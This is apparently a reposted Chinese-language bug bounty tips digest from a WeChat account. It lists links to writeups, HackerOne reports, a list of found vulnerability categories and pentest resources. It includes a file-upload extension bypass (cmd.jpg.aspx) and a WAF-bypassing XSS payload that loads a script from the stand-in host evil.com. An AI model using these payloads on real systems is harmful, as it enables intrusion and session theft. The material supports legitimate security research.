价值2w刀的思路:
Web app run with Microsoft
With fuzzing found endpoint allow to upload jpg file
bypass was cmd.jpg.aspx
Akamai blocked me
bypassed cmd.jpg.aspx.
Aspx[dot]
23000$ for Authentication Bypass & File Upload & Arbitrary File Overwrite(价值2w刀的writeup):
https://medium.com/@h4x0r_dz/23000-for-authentication-bypass-file-upload-arbitrary-file-overwrite-2578b730a5f8
Four Steps You Need To Take to Prepare for Ransomware Attacks:
https://infosecwriteups.com/four-steps-to-prepare-for-a-ransomware-attack-ab74d98abdaa?source=rss—-7b722bfd1b8d—4
Mass Accounts Takeover Without any user Interaction at https://app.taxjar.com/(比较遗憾,没有详情)
https://hackerone.com/reports/1685970 ($13000.0)
Last two months of categories for my approved vulns (de-duped)
– HTMLi
– Sensitive API Keys
– DOM XSS
– Default Creds – Admin
– DNS Zone Takeover
– Dependency Confusion
– RXSS
– Persistent Blind XSS
– SQLi
– Subdomain Takeover
– RCE
– Command Injection
Akami WAF 403 bypassed
<img src=x onerror= a=document;cc=a.createElement('script');cc.src='//evil.com/attack.js';a.querySelector('head').append(cc)>OAuth 2.0 Hacking
https://gowthamaraj-rajendran.medium.com/oauth-2-0-hacking-67e5d2b9b495
xnLinkFinder – A Python Tool Used To Discover Endpoints (And Potential Parameters) For A Given Target
https://www.kitploit.com/2022/10/xnlinkfinder-python-tool-used-to.html
Bug bounty 一血:
https://medium.com/@deepuppal198/my-first-p2-bug-b-xss-9e64b5dc2921
Mobile Application Penetration Testing Cheat Sheet
https://github.com/tanprathan/MobileApp-Pentest-Cheatsheet
原文始发于微信公众号(Bug Bounty Tips):Bug Bounty Tips(2022-10-20)
